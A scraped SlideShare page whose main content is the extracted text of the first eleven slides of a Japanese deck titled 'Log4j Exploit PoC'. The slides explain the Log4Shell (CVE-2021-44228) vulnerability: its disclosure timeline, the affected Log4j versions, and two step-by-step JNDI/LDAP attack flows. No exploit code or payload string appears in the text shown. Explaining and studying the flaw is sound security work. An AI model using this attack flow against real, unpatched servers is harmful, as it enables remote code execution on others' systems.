Submit Search
Upload
Log4j Exploit PoC
•
Download as PPTX, PDF
•
0 likes
•
1,161 views
T
tomoakitsutsui
Follow
this is document on log4j exploit and around info
Read less
Read more
Internet
Report
Share
Report
Share
1 of 22
Download now
Recommended
HoloLens2とPCで、WebRTCで映像をやりとり
HoloLens2とPCで、WebRTCで映像をやりとり
聡 大久保
(文字のつぶれがましなPDF版も公開しています。) MixedReality-WebRTC 1.0.3(M71)を、Unity2018で環境構築した際の手順をまとめたものです、Exsampleを実機で動かすところまで記載しています。 WebRTCを使うことで、デバイス間(PC・HoloLens2)で映像のやりとりができるようになります。HoloLens2でWebRTCを使うことを想定した場合、画面の共有や、リモートメンテナンス時のビデオチャット用途などに利用できると思います。 PDF版URL https://drive.google.com/file/d/1Y0hVaiar9CI4U--aV7tYUWBM3bwfe-4M/view?usp=sharing
ログ解析を支えるNoSQLの技術
ログ解析を支えるNoSQLの技術
Drecom Co., Ltd.
FIDO認証によるパスワードレスログイン実装入門
FIDO認証によるパスワードレスログイン実装入門
Yahoo!デベロッパーネットワーク
HTML5 Conference2018で発表した内容です。 #html5j #html5j_a
基礎から学ぶ組み込みAndroid
基礎から学ぶ組み込みAndroid
demuyan
名古屋GeekBar(June-3,2011)発表分
TEE (Trusted Execution Environment)は第二の仮想化技術になるか?
TEE (Trusted Execution Environment)は第二の仮想化技術になるか?
Kuniyasu Suzaki
第32回コンピュータシステム・シンポジウム(ComSys2020)招待講演で使ったスライドです。TEE(Trusted Execution Environment)のハードウェア実装(Arm TrustZone, Intel SGX, RISC-V Keystone)の解説から、それぞれのTEE上のソフトウェア実装が多く異なる話、仮想化(Arm v8.4AでのTEE内仮想化、Intel TDX: Trusted Domain Extensions、AMD SEV: Secure Encrypted Virtualization)が導入されてくる話をしました。また、TEEに対するアンチテーゼの研究や関連規格などを紹介しました。
FridaによるAndroidアプリの動的解析とフッキングの基礎
FridaによるAndroidアプリの動的解析とフッキングの基礎
ken_kitahara
DroidKaigi 2019講演資料
FIDO2 ~ パスワードのいらない世界へ
FIDO2 ~ パスワードのいらない世界へ
FIDO Alliance
APPS Japan 2019 FIDOアライアンス ボードメンバー / (株)NTTドコモ FIDO Japan WG座長 / プロダクト部 プロダクトイノベーション担当部長 森山 光一 FIDOアライアンス ボードメンバー / ヤフー(株) ID・セキュリティユニット / パスワードレス プロジェクトマネージャー 酒井 公希 https://forest.f2ff.jp/introduction?event_ids[]=4&project_id=1&action=search&e=apps
モノリスからマイクロサービスへの移行 ~ストラングラーパターンの検証~(Spring Fest 2020講演資料)
モノリスからマイクロサービスへの移行 ~ストラングラーパターンの検証~(Spring Fest 2020講演資料)
NTT DATA Technology & Innovation
モノリスからマイクロサービスへの移行 ~ストラングラーパターンの検証~ (Spring Fest 2020講演資料) 2020年12月17日 NTTデータ 技術革新統括本部 横井 一輝
Recommended
HoloLens2とPCで、WebRTCで映像をやりとり
HoloLens2とPCで、WebRTCで映像をやりとり
聡 大久保
(文字のつぶれがましなPDF版も公開しています。) MixedReality-WebRTC 1.0.3(M71)を、Unity2018で環境構築した際の手順をまとめたものです、Exsampleを実機で動かすところまで記載しています。 WebRTCを使うことで、デバイス間(PC・HoloLens2)で映像のやりとりができるようになります。HoloLens2でWebRTCを使うことを想定した場合、画面の共有や、リモートメンテナンス時のビデオチャット用途などに利用できると思います。 PDF版URL https://drive.google.com/file/d/1Y0hVaiar9CI4U--aV7tYUWBM3bwfe-4M/view?usp=sharing
ログ解析を支えるNoSQLの技術
ログ解析を支えるNoSQLの技術
Drecom Co., Ltd.
FIDO認証によるパスワードレスログイン実装入門
FIDO認証によるパスワードレスログイン実装入門
Yahoo!デベロッパーネットワーク
HTML5 Conference2018で発表した内容です。 #html5j #html5j_a
基礎から学ぶ組み込みAndroid
基礎から学ぶ組み込みAndroid
demuyan
名古屋GeekBar(June-3,2011)発表分
TEE (Trusted Execution Environment)は第二の仮想化技術になるか?
TEE (Trusted Execution Environment)は第二の仮想化技術になるか?
Kuniyasu Suzaki
第32回コンピュータシステム・シンポジウム(ComSys2020)招待講演で使ったスライドです。TEE(Trusted Execution Environment)のハードウェア実装(Arm TrustZone, Intel SGX, RISC-V Keystone)の解説から、それぞれのTEE上のソフトウェア実装が多く異なる話、仮想化(Arm v8.4AでのTEE内仮想化、Intel TDX: Trusted Domain Extensions、AMD SEV: Secure Encrypted Virtualization)が導入されてくる話をしました。また、TEEに対するアンチテーゼの研究や関連規格などを紹介しました。
FridaによるAndroidアプリの動的解析とフッキングの基礎
FridaによるAndroidアプリの動的解析とフッキングの基礎
ken_kitahara
DroidKaigi 2019講演資料
FIDO2 ~ パスワードのいらない世界へ
FIDO2 ~ パスワードのいらない世界へ
FIDO Alliance
APPS Japan 2019 FIDOアライアンス ボードメンバー / (株)NTTドコモ FIDO Japan WG座長 / プロダクト部 プロダクトイノベーション担当部長 森山 光一 FIDOアライアンス ボードメンバー / ヤフー(株) ID・セキュリティユニット / パスワードレス プロジェクトマネージャー 酒井 公希 https://forest.f2ff.jp/introduction?event_ids[]=4&project_id=1&action=search&e=apps
モノリスからマイクロサービスへの移行 ~ストラングラーパターンの検証~(Spring Fest 2020講演資料)
モノリスからマイクロサービスへの移行 ~ストラングラーパターンの検証~(Spring Fest 2020講演資料)
NTT DATA Technology & Innovation
モノリスからマイクロサービスへの移行 ~ストラングラーパターンの検証~ (Spring Fest 2020講演資料) 2020年12月17日 NTTデータ 技術革新統括本部 横井 一輝
今だからこそ知りたい Docker Compose/Swarm 入門
今だからこそ知りたい Docker Compose/Swarm 入門
Masahito Zembutsu
「Docker Machine/Compose/Swarm」を使ってみよう 発表資料 https://sakura-kanto.doorkeeper.jp/events/36134 日時:2016年1月22日(金)19:00~21:00 会場:さくらインターネット 西新宿セミナールーム@東京・西新宿 対象:Dockerに関心がありDocker Machine/Compose/Swarmを触った事がない人
Keycloak入門
Keycloak入門
Hiroyuki Wada
OSSセキュリティ技術の会 第三回勉強会 Keycloak入門 https://secureoss-sig.connpass.com/event/90917/
フロー効率性とリソース効率性について #xpjug
フロー効率性とリソース効率性について #xpjug
Itsuki Kuroda
XP祭り2017のセッションのスライドになります。 http://xpjug.com/xp2017-session-a5-1/ 元ネタは以下です。 http://i2key.hateblo.jp/entry/2017/05/15/082655 ※CCPMの表記について一部誤解を与える部分がありましたので、表記を削除いたしました。 2017/09/21 0:27
目grep入門 +解説
目grep入門 +解説
murachue
目grep入門があまりにもKernelVM::入門だという指摘があったため、解説をつけてよりstd::入門に近づけてみました。
Hololens2 MRTK2.7(OpenXR) でのビルド環境構築(環境設定からビルドまで)
Hololens2 MRTK2.7(OpenXR) でのビルド環境構築(環境設定からビルドまで)
聡 大久保
HoloLens2(Unity2020 + MRTK v2.7 + OpenXR)のビルド手順をまとめました。 ・MRTKビルド環境構築手順 ・MRTKのBuild Toolの利用方法
ネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptx
ネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptx
Shota Shinogi
SNSのアカウントを見つけてくれるツール「Blackbird」のレビュースライドです。
20160526 依存関係逆転の原則
20160526 依存関係逆転の原則
bonjin6770 Kurosawa
#7 でがらし会
Azure ADとIdentity管理
Azure ADとIdentity管理
Naohiro Fujie
2014年6月28日 .NETラボ「認証系を勉強する一日」で使ったスライド。 Azure ADのIdentity管理の話。OAuthでWebAPIを保護する方法、OpenID Connectへの対応状況など。
SFUの話
SFUの話
tnoho
WebRTC MeetUp Tokyo #10 で話した内容です。
gitを使って、レポジトリの一部抽出forkしてみました
gitを使って、レポジトリの一部抽出forkしてみました
Takako Miyagawa
gitを使って、レポジトリの一部抽出forkしてみました
SQLアンチパターン 幻の第26章「とりあえず削除フラグ」
SQLアンチパターン 幻の第26章「とりあえず削除フラグ」
Takuto Wada
SQLアンチパターン 26章「とりあえず削除フラグ」 2015/08/31 @ GMO Yours #ronsakucasual https://atnd.org/events/68902
今なら間に合う分散型IDとEntra Verified ID
今なら間に合う分散型IDとEntra Verified ID
Naohiro Fujie
6/30のOffice365勉強会のEntra Verified ID特集の資料です。 分散型ID、Entra Verified IDの解説をしています。
コンテナの作り方「Dockerは裏方で何をしているのか?」
コンテナの作り方「Dockerは裏方で何をしているのか?」
Masahito Zembutsu
Dockerやコンテナについての理解を目指す入門テキストです。 CloudNative Days Kansai 2019 - #CNDK2019 における発表資料です。 https://cloudnativedays.jp/cndk2019/
ゲーム開発環境の自動化
ゲーム開発環境の自動化
Masahiko Nakamura
ゲーム開発環境を自動化する時の話まとめ。
こんなに使える!今どきのAPIドキュメンテーションツール
こんなに使える!今どきのAPIドキュメンテーションツール
dcubeio
http://d-cube.connpass.com/event/43057/ にて発表した内容です
Seasar2で作った俺たちのサービスの今
Seasar2で作った俺たちのサービスの今
Koichi Sakata
2016/05/21(土) 17:00〜17:50 JJUG CCC 2016 Spring GH-6 2011年にリリースした弊社のサービスは、Seasar2ファミリーで構築しました。利用者数は1000万人以上となり、今もサービスとして成長しています。2016/9/26にSeasar2がサポートを終了するというアナウンスを受け、私たちもアクションを起こしました。 サービスには絶え間なく機能改善、機能追加の要件があり、その対応をしながらSeasar2から移行するという前提条件を考慮すると、選択肢は限られます。Scalaなど言語自体を変えることはなく、Javaのままとしました。新規アプリケーションを作成すると監視対象とするアプリケーションの数が増え、様々なコストが増えると考えたため新規とはしませんでした。こういったさまざまな条件のもと、まずはSeasar2で動作している機能から、まずリスクが小さい機能を新フレームワークで置き換え(ユニットテストも書き換え受け入れテストもし直し)てリリースしました。そして機能追加と並行して置き換えを進めています。 技術的には、移行対象としてはSpringを選択しました。Seasar2にある機能がそのままある場合もあれば、コードを書いて対応したものもあります。他に、S2DaoでのRDBMSへのアクセスを含んだビジネスロジックも、移行コストを最低限にするために資産としてSpringのコードからも利用できるようにしました。ユニットテストについてもS2TestCase とdjUnitから、単純作業として書き換えやすかったjMockitに移行しました。 セッションでは、こういった判断に至った経緯やその実現手法、メンバーへレクチャーなど移行のスタートから現時点のリリースまでにあるさまざまなことを話します。すばらしい判断でもなければすごい技術力で解決したわけでもない、普通なプロジェクトの現場で実際にやったことならではのリアルさを感じていただけると思います。
ソフトウェア開発における『知の高速道路』
ソフトウェア開発における『知の高速道路』
Yoshitaka Kawashima
吉祥寺.pm #26でお話したソフトウェア開発における『知の高速道路』の話です。 将棋や数学とのソレには程遠い。主にサッカーの戦術的ピリオダイゼーションを参考に考えてみました。が結論は、まだありません。
世界でいちばんわかりやすいドメイン駆動設計
世界でいちばんわかりやすいドメイン駆動設計
増田 亨
エヴァンス本を読んだことがない人、ネット上の情報を聞きかじったことがある程度の人、そんな人たちを対象に、ドメイン駆動設計について、わかりやすく説明してみました。
マイクロサービス 4つの分割アプローチ
マイクロサービス 4つの分割アプローチ
増田 亨
アプリケーションの分割のアプローチ ●4つのアプローチ - ビジネスファンクション - 動詞/ユースケース - 名詞/リソース - 境界づけられたコンテキスト ● トランザクションの分割 - パイプライン化 (VETRO) - コーディネート (Saga) - 状態更新の非同期化 ( Event History - State Materialize - Domain Specific Query )
GraalVMの多言語実行機能が凄そうだったので試しにApache Sparkに組み込んで動かしてみたけどちょっとまだ早かったかもしれない(Open So...
GraalVMの多言語実行機能が凄そうだったので試しにApache Sparkに組み込んで動かしてみたけどちょっとまだ早かったかもしれない(Open So...
NTT DATA Technology & Innovation
GraalVMの多言語実行機能が凄そうだったので試しにApache Sparkに組み込んで動かしてみたけどちょっとまだ早かったかもしれない (Open Source Conference 2021 Online/Nagoya 発表資料) 2021年5月29日 株式会社NTTデータ 技術開発本部 先進コンピューティング技術センタ 刈谷 満
Odl intro20141029
Odl intro20141029
NEC Corporation
Introduction to ODL. Used at the Hackfest Tokyo on Oct. 29, 2014.
Java/Androidセキュアコーディング
Java/Androidセキュアコーディング
Masaki Kubo
Developers Summit 2012講演 タイトル:Java/Android セキュアコーディング 講演者:JPCERT/CC 久保 正樹
More Related Content
What's hot
今だからこそ知りたい Docker Compose/Swarm 入門
今だからこそ知りたい Docker Compose/Swarm 入門
Masahito Zembutsu
「Docker Machine/Compose/Swarm」を使ってみよう 発表資料 https://sakura-kanto.doorkeeper.jp/events/36134 日時:2016年1月22日(金)19:00~21:00 会場:さくらインターネット 西新宿セミナールーム@東京・西新宿 対象:Dockerに関心がありDocker Machine/Compose/Swarmを触った事がない人
Keycloak入門
Keycloak入門
Hiroyuki Wada
OSSセキュリティ技術の会 第三回勉強会 Keycloak入門 https://secureoss-sig.connpass.com/event/90917/
フロー効率性とリソース効率性について #xpjug
フロー効率性とリソース効率性について #xpjug
Itsuki Kuroda
XP祭り2017のセッションのスライドになります。 http://xpjug.com/xp2017-session-a5-1/ 元ネタは以下です。 http://i2key.hateblo.jp/entry/2017/05/15/082655 ※CCPMの表記について一部誤解を与える部分がありましたので、表記を削除いたしました。 2017/09/21 0:27
目grep入門 +解説
目grep入門 +解説
murachue
目grep入門があまりにもKernelVM::入門だという指摘があったため、解説をつけてよりstd::入門に近づけてみました。
Hololens2 MRTK2.7(OpenXR) でのビルド環境構築(環境設定からビルドまで)
Hololens2 MRTK2.7(OpenXR) でのビルド環境構築(環境設定からビルドまで)
聡 大久保
HoloLens2(Unity2020 + MRTK v2.7 + OpenXR)のビルド手順をまとめました。 ・MRTKビルド環境構築手順 ・MRTKのBuild Toolの利用方法
ネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptx
ネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptx
Shota Shinogi
SNSのアカウントを見つけてくれるツール「Blackbird」のレビュースライドです。
20160526 依存関係逆転の原則
20160526 依存関係逆転の原則
bonjin6770 Kurosawa
#7 でがらし会
Azure ADとIdentity管理
Azure ADとIdentity管理
Naohiro Fujie
2014年6月28日 .NETラボ「認証系を勉強する一日」で使ったスライド。 Azure ADのIdentity管理の話。OAuthでWebAPIを保護する方法、OpenID Connectへの対応状況など。
SFUの話
SFUの話
tnoho
WebRTC MeetUp Tokyo #10 で話した内容です。
gitを使って、レポジトリの一部抽出forkしてみました
gitを使って、レポジトリの一部抽出forkしてみました
Takako Miyagawa
gitを使って、レポジトリの一部抽出forkしてみました
SQLアンチパターン 幻の第26章「とりあえず削除フラグ」
SQLアンチパターン 幻の第26章「とりあえず削除フラグ」
Takuto Wada
SQLアンチパターン 26章「とりあえず削除フラグ」 2015/08/31 @ GMO Yours #ronsakucasual https://atnd.org/events/68902
今なら間に合う分散型IDとEntra Verified ID
今なら間に合う分散型IDとEntra Verified ID
Naohiro Fujie
6/30のOffice365勉強会のEntra Verified ID特集の資料です。 分散型ID、Entra Verified IDの解説をしています。
コンテナの作り方「Dockerは裏方で何をしているのか?」
コンテナの作り方「Dockerは裏方で何をしているのか?」
Masahito Zembutsu
Dockerやコンテナについての理解を目指す入門テキストです。 CloudNative Days Kansai 2019 - #CNDK2019 における発表資料です。 https://cloudnativedays.jp/cndk2019/
ゲーム開発環境の自動化
ゲーム開発環境の自動化
Masahiko Nakamura
ゲーム開発環境を自動化する時の話まとめ。
こんなに使える!今どきのAPIドキュメンテーションツール
こんなに使える!今どきのAPIドキュメンテーションツール
dcubeio
http://d-cube.connpass.com/event/43057/ にて発表した内容です
Seasar2で作った俺たちのサービスの今
Seasar2で作った俺たちのサービスの今
Koichi Sakata
2016/05/21(土) 17:00〜17:50 JJUG CCC 2016 Spring GH-6 2011年にリリースした弊社のサービスは、Seasar2ファミリーで構築しました。利用者数は1000万人以上となり、今もサービスとして成長しています。2016/9/26にSeasar2がサポートを終了するというアナウンスを受け、私たちもアクションを起こしました。 サービスには絶え間なく機能改善、機能追加の要件があり、その対応をしながらSeasar2から移行するという前提条件を考慮すると、選択肢は限られます。Scalaなど言語自体を変えることはなく、Javaのままとしました。新規アプリケーションを作成すると監視対象とするアプリケーションの数が増え、様々なコストが増えると考えたため新規とはしませんでした。こういったさまざまな条件のもと、まずはSeasar2で動作している機能から、まずリスクが小さい機能を新フレームワークで置き換え(ユニットテストも書き換え受け入れテストもし直し)てリリースしました。そして機能追加と並行して置き換えを進めています。 技術的には、移行対象としてはSpringを選択しました。Seasar2にある機能がそのままある場合もあれば、コードを書いて対応したものもあります。他に、S2DaoでのRDBMSへのアクセスを含んだビジネスロジックも、移行コストを最低限にするために資産としてSpringのコードからも利用できるようにしました。ユニットテストについてもS2TestCase とdjUnitから、単純作業として書き換えやすかったjMockitに移行しました。 セッションでは、こういった判断に至った経緯やその実現手法、メンバーへレクチャーなど移行のスタートから現時点のリリースまでにあるさまざまなことを話します。すばらしい判断でもなければすごい技術力で解決したわけでもない、普通なプロジェクトの現場で実際にやったことならではのリアルさを感じていただけると思います。
ソフトウェア開発における『知の高速道路』
ソフトウェア開発における『知の高速道路』
Yoshitaka Kawashima
吉祥寺.pm #26でお話したソフトウェア開発における『知の高速道路』の話です。 将棋や数学とのソレには程遠い。主にサッカーの戦術的ピリオダイゼーションを参考に考えてみました。が結論は、まだありません。
世界でいちばんわかりやすいドメイン駆動設計
世界でいちばんわかりやすいドメイン駆動設計
増田 亨
エヴァンス本を読んだことがない人、ネット上の情報を聞きかじったことがある程度の人、そんな人たちを対象に、ドメイン駆動設計について、わかりやすく説明してみました。
マイクロサービス 4つの分割アプローチ
マイクロサービス 4つの分割アプローチ
増田 亨
アプリケーションの分割のアプローチ ●4つのアプローチ - ビジネスファンクション - 動詞/ユースケース - 名詞/リソース - 境界づけられたコンテキスト ● トランザクションの分割 - パイプライン化 (VETRO) - コーディネート (Saga) - 状態更新の非同期化 ( Event History - State Materialize - Domain Specific Query )
GraalVMの多言語実行機能が凄そうだったので試しにApache Sparkに組み込んで動かしてみたけどちょっとまだ早かったかもしれない(Open So...
GraalVMの多言語実行機能が凄そうだったので試しにApache Sparkに組み込んで動かしてみたけどちょっとまだ早かったかもしれない(Open So...
NTT DATA Technology & Innovation
GraalVMの多言語実行機能が凄そうだったので試しにApache Sparkに組み込んで動かしてみたけどちょっとまだ早かったかもしれない (Open Source Conference 2021 Online/Nagoya 発表資料) 2021年5月29日 株式会社NTTデータ 技術開発本部 先進コンピューティング技術センタ 刈谷 満
What's hot
(20)
今だからこそ知りたい Docker Compose/Swarm 入門
今だからこそ知りたい Docker Compose/Swarm 入門
Keycloak入門
Keycloak入門
フロー効率性とリソース効率性について #xpjug
フロー効率性とリソース効率性について #xpjug
目grep入門 +解説
目grep入門 +解説
Hololens2 MRTK2.7(OpenXR) でのビルド環境構築(環境設定からビルドまで)
Hololens2 MRTK2.7(OpenXR) でのビルド環境構築(環境設定からビルドまで)
ネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptx
ネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptx
20160526 依存関係逆転の原則
20160526 依存関係逆転の原則
Azure ADとIdentity管理
Azure ADとIdentity管理
SFUの話
SFUの話
gitを使って、レポジトリの一部抽出forkしてみました
gitを使って、レポジトリの一部抽出forkしてみました
SQLアンチパターン 幻の第26章「とりあえず削除フラグ」
SQLアンチパターン 幻の第26章「とりあえず削除フラグ」
今なら間に合う分散型IDとEntra Verified ID
今なら間に合う分散型IDとEntra Verified ID
コンテナの作り方「Dockerは裏方で何をしているのか?」
コンテナの作り方「Dockerは裏方で何をしているのか?」
ゲーム開発環境の自動化
ゲーム開発環境の自動化
こんなに使える!今どきのAPIドキュメンテーションツール
こんなに使える!今どきのAPIドキュメンテーションツール
Seasar2で作った俺たちのサービスの今
Seasar2で作った俺たちのサービスの今
ソフトウェア開発における『知の高速道路』
ソフトウェア開発における『知の高速道路』
世界でいちばんわかりやすいドメイン駆動設計
世界でいちばんわかりやすいドメイン駆動設計
マイクロサービス 4つの分割アプローチ
マイクロサービス 4つの分割アプローチ
GraalVMの多言語実行機能が凄そうだったので試しにApache Sparkに組み込んで動かしてみたけどちょっとまだ早かったかもしれない(Open So...
GraalVMの多言語実行機能が凄そうだったので試しにApache Sparkに組み込んで動かしてみたけどちょっとまだ早かったかもしれない(Open So...
Similar to Log4j Exploit PoC
Odl intro20141029
Odl intro20141029
NEC Corporation
Introduction to ODL. Used at the Hackfest Tokyo on Oct. 29, 2014.
Java/Androidセキュアコーディング
Java/Androidセキュアコーディング
Masaki Kubo
Developers Summit 2012講演 タイトル:Java/Android セキュアコーディング 講演者:JPCERT/CC 久保 正樹
【DeepSecurityUserNight】我が家の箱入り娘を世間に晒すのは危険なのでDeepSecurityに見守ってもらった話
【DeepSecurityUserNight】我が家の箱入り娘を世間に晒すのは危険なのでDeepSecurityに見守ってもらった話
Hibino Hisashi
DeepSecurityUserNight#5
20150421 Geeks Night @ Money Foward
20150421 Geeks Night @ Money Foward
Naoki Shimizu
Self Introduction LT in Geeks Night
JavaFX & GlassFish 勉強会 Project Visage
JavaFX & GlassFish 勉強会 Project Visage
Yuichi Sakuraba
Nv2017 19 (invited) mibu (nec)
Nv2017 19 (invited) mibu (nec)
ssuser3feafb
trend of nfv opensource project
[JPCERT/CC POC Meeting] 研究紹介 + DLLハイジャックの脆弱性
[JPCERT/CC POC Meeting] 研究紹介 + DLLハイジャックの脆弱性
Asuka Nakajima
[活動紹介] 研究紹介 + DLLハイジャックの脆弱性
Dockerが抱えるネットワークの課題
Dockerが抱えるネットワークの課題
Asuka Suzuki
2015年7月22日 社内勉強会でDockerについて説明したスライドです。 詳しくは http://tanksuzuki.com/post/docker-inhouse-training/ へどうぞ。
静的解析ツール Klocworkによる 機能安全規格への対応
静的解析ツール Klocworkによる 機能安全規格への対応
Masaru Horioka
20160427に株式会社シーイーシー様「ソフトウェア品質生産性向上セミナー~ システム機能安全規格適合ソリューション~」で発表させていただいた、静的解析ツールKlocworkを用いた機能安全規格への対応(主にISO26262)を紹介するプレゼン資料です。
First vr sdk_introduction
First vr sdk_introduction
SatoshiHosono
FIrstVR SDKの使い方(入門編)
はじめてのAzure Web App for Containers! -コンテナの基礎から DevOps 環境の構築まで-
はじめてのAzure Web App for Containers! -コンテナの基礎から DevOps 環境の構築まで-
Saki Homma
2017/12/08 OSC .Enterpriseのセッション資料 Azure Web App for Containerの紹介やコンテナの基礎から DevOps 環境の構築まで
2014 0228 OSC-Spring Tokyo NETMF
2014 0228 OSC-Spring Tokyo NETMF
Atomu Hidaka
オープンソースになったマイコン開発環境 .NET Micro Frameworkの紹介。 使って簡単!楽しいMicrosoftの小型組み込みOS ドットNETまいくろバンザイ倶楽部
Ruby用の静的コード解析ツールざくっと紹介 by SideCI #omotesandorb
Ruby用の静的コード解析ツールざくっと紹介 by SideCI #omotesandorb
Koichiro Sumi
3つの静的解析ツールのご紹介スライドです。序盤ではHoundCIとSideCIを軽く紹介しています。 Brakeman: セキュリティのアップデート情報と初歩的ミスに役立つ Reek: コードの悪い傾向を検知、予防できる RailsBestPractices: Rails特有のbetterな方法についてチェックできる
Java in the World of Container by David Buck
Java in the World of Container by David Buck
オラクルエンジニア通信
2018/11/13,15に東京・大阪で行われたナイトセミナー[Oracle Groundbreakers APAC Tour]でのDavid Buck(日本オラクル)のセッション資料です。Docker Container上でJavaを動作させる際に利用できるテクノロジーの紹介と、実行イメージをどれだけ小さく、高速化できるかを解説しています。
120315 cloud founry_java_ironfoundry
120315 cloud founry_java_ironfoundry
Takayoshi Tanaka
The 5th Cloud Foundry Code Reading in Japan. How to deploy to Cloud Foundry from Jenkins using Maven plugin for Cloud Foundry. Remote Debugging new feature in Micro Cloud Foundry. Short introduction for IronFoundry.
最適なOpenJDKディストリビューションの選び方 #codetokyo19B3 #ccc_l5
最適なOpenJDKディストリビューションの選び方 #codetokyo19B3 #ccc_l5
Takahiro YAMADA
5/17 Oracle Code Tokyo 2019、5/18 JJUG CCCのセッション資料です。https://togetter.com/li/1356223 も併せて参照ください。 以下、Oracle Code Tokyo 2019 https://www.oracle.co.jp/events/code/2019/ でのセッション概要より転記します。 -------- 2019年1月末で、Oracle JDK/JRE 8の商用ユーザー向けのPublic Updatesが終了しました。また、Java 9以降ではJDKのリリースモデルが変更になり、並行してOracle JDK 8までの商用機能がOpenJDKに寄贈されていきました。 こうした流れにより、特にJava 9がリリースされた2017年9月以降には様々なOpenJDKディストリビューションが出てきており、選択肢が大きく増えた反面、どれを選べばよいのかが分からない・多様になっただけに混乱を招く、などの話を耳にすることもあります。 本セッションでは、マルチプラットフォームに対応した主要なJDKディストリビューションの特徴を説明するとともに、どのような軸で判断していくべきかを提示することで、皆様の環境・状況にあった最適なJDK選びをお手伝いいたします。
Keycloakの実際・翻訳プロジェクト紹介
Keycloakの実際・翻訳プロジェクト紹介
Hiroyuki Wada
OSSセキュリティ技術の会 第二回勉強会 https://secureoss-sig.connpass.com/event/69314/
Qlik Alerting で実現する Qlik Sense Enterprise Client-managed (Windows版) の高度でインテリジ...
Qlik Alerting で実現する Qlik Sense Enterprise Client-managed (Windows版) の高度でインテリジ...
QlikPresalesJapan
Qlik Alertingは、Qlik Sense Enterprise Client-managed の付加価値製品です。 Qlik Alertingを利用すると、閾値の設定や外れ値・異常値の検出を評価し、アラートを配信することが可能です。ユーザはメールやモバイルアプリでアラートを受信することができ、タイムリーなアクションを促すことが可能となります。 必要なアプリに対して、セルフサービスでアラートを設定することができます。また、リロードタスクなどの終了やエラーの通知、一斉配信メッセージの配信なども設定できます。 本セッションでは、Qlik Alerting のアラートの設定から配信までの流れをデモンストレーションで解説いたします。
Security Learning Vol2 話題の脆弱性をコードで紐解く!
Security Learning Vol2 話題の脆弱性をコードで紐解く!
YOJI WATANABE
Security Learning の第2回勉強会の資料
LibreOfficeをビルドしてみよう(Windows)
LibreOfficeをビルドしてみよう(Windows)
Masataka Kondo
2016/1/24浜名湖LibreOffice勉強会での発表資料です。
Similar to Log4j Exploit PoC
(20)
Odl intro20141029
Odl intro20141029
Java/Androidセキュアコーディング
Java/Androidセキュアコーディング
【DeepSecurityUserNight】我が家の箱入り娘を世間に晒すのは危険なのでDeepSecurityに見守ってもらった話
【DeepSecurityUserNight】我が家の箱入り娘を世間に晒すのは危険なのでDeepSecurityに見守ってもらった話
20150421 Geeks Night @ Money Foward
20150421 Geeks Night @ Money Foward
JavaFX & GlassFish 勉強会 Project Visage
JavaFX & GlassFish 勉強会 Project Visage
Nv2017 19 (invited) mibu (nec)
Nv2017 19 (invited) mibu (nec)
[JPCERT/CC POC Meeting] 研究紹介 + DLLハイジャックの脆弱性
[JPCERT/CC POC Meeting] 研究紹介 + DLLハイジャックの脆弱性
Dockerが抱えるネットワークの課題
Dockerが抱えるネットワークの課題
静的解析ツール Klocworkによる 機能安全規格への対応
静的解析ツール Klocworkによる 機能安全規格への対応
First vr sdk_introduction
First vr sdk_introduction
はじめてのAzure Web App for Containers! -コンテナの基礎から DevOps 環境の構築まで-
はじめてのAzure Web App for Containers! -コンテナの基礎から DevOps 環境の構築まで-
2014 0228 OSC-Spring Tokyo NETMF
2014 0228 OSC-Spring Tokyo NETMF
Ruby用の静的コード解析ツールざくっと紹介 by SideCI #omotesandorb
Ruby用の静的コード解析ツールざくっと紹介 by SideCI #omotesandorb
Java in the World of Container by David Buck
Java in the World of Container by David Buck
120315 cloud founry_java_ironfoundry
120315 cloud founry_java_ironfoundry
最適なOpenJDKディストリビューションの選び方 #codetokyo19B3 #ccc_l5
最適なOpenJDKディストリビューションの選び方 #codetokyo19B3 #ccc_l5
Keycloakの実際・翻訳プロジェクト紹介
Keycloakの実際・翻訳プロジェクト紹介
Qlik Alerting で実現する Qlik Sense Enterprise Client-managed (Windows版) の高度でインテリジ...
Qlik Alerting で実現する Qlik Sense Enterprise Client-managed (Windows版) の高度でインテリジ...
Security Learning Vol2 話題の脆弱性をコードで紐解く!
Security Learning Vol2 話題の脆弱性をコードで紐解く!
LibreOfficeをビルドしてみよう(Windows)
LibreOfficeをビルドしてみよう(Windows)
Log4j Exploit PoC
1.
JNDI Injection Log4j Exploit
PoC VERSION 1.0.0 CREATED BY @tomoaki.tsutsui
2.
脆弱性検証は自己責任で!
3.
この日なんの日 2021-12-09
4.
Log4j脆弱性が全世界に公開された日 2021-12-09
5.
Log4jの脆弱性とは? 今回の脆弱性は「Log4Shell」と呼ばれていて 「別名:CVE-2021-44228」というCVE番号が付与されている脆弱性 Javaの主要なロギングフレームワークである「Log4j」で 発見されたゼロデイの任意コードが実行できる脆弱性
6.
時系列 2021年11月24日 Alibabaのクラウドセキュリティチームによって発見、秘密裏にApacheに報告 2021年12月9日に一般に公開 至急対応依頼が全国に出回る!
7.
影響サービス/代表事例 全世界のlog4j2の以下バージョンを利用しているサービスに影響! Apache Log4j-core 2.15.0より前の2系のバージョン ※補足:Log4jライブラリは1系と2系で別れており、影響があるのは2系の上記バージョンのみ (LookUps機能が1系には存在しないため) MINECRAFT内のチャット機能を 通じて受信者のPCで 任意のコマンドを発行できる 不具合
8.
攻撃手法 今回悪用されたのはLog4jに備わっているLookups機能 Lookups機能の中の1つであるJNDI Lookup機能により攻撃者により任 意のコマンドを実行される可能性がある Apache Log4j
Lookups / Jndi Lookup
9.
攻撃パターン①:LDAPサーバを介する ①悪意のある人が脆弱性のある アプリへ悪意のあるリクエスト ②脆弱性のあるアプリ内のlog4jライ ブラリーが動作 ③脆弱性のあるアプリから悪意のあ るLDAPサーバへリクエスト送信 ④悪意のあるLDAPサーバからレス ポンス送信 ⑤脆弱性のあるアプリが、不正な Javaクラスをダウンロード 引用:Zero-Day Exploit Targeting
Popular Java Library Log4j
10.
攻撃パターン②:LDAPサーバを介さない ①悪意のある人が脆弱性のある アプリへ悪意のあるリクエスト ②脆弱性のあるアプリ内のlog4jライ ブラリーが動作 ③脆弱性のあるアプリが、不正な Javaクラスをダウンロード ④不正なJavaクラスが実行される 引用:Observation of Attacks
Targeting Apache Log4j2 RCE Vulnerability (CVE-2021-44228)
11.
